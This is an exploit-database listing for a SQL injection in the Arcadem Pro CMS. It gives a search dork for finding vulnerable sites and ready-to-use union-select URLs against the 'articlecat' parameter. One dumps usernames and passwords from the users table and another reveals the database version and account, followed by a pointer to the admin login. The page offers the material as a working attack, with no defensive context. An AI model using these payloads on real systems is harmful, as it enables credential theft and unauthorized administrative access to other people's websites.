[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Arcadem Pro (articlecat) Remote SQL Injection Vulnerability

Author
Hussin X
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3800
Category
web applications
Date add
28-09-2008
Platform
unsorted
===========================================================
Arcadem Pro (articlecat) Remote SQL Injection Vulnerability
===========================================================


|___________________________________________________
|                                                   |
|
| script : https://secure.agaresmedia.com/index.php?page=arcadempro.php
|
| DorK   : Copyright © 2007 Agares Media. Powered by AMCMS3.
|___________________________________________________|


Exploit:
________



www.[target].com/Script/index.php?loadpage=./includes/articleblock.php&articlecat=-1+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10/**/FROM/**/amcms_users--


USer version


www.[target].com/Script/index.php?loadpage=./includes/articleblock.php&articlecat=-1+union+select+1,version(),user(),4,5,6,7,8,9,10--



Admin LogIn :

www.[target].com/admin/




#  0day.today [2024-10-06]  #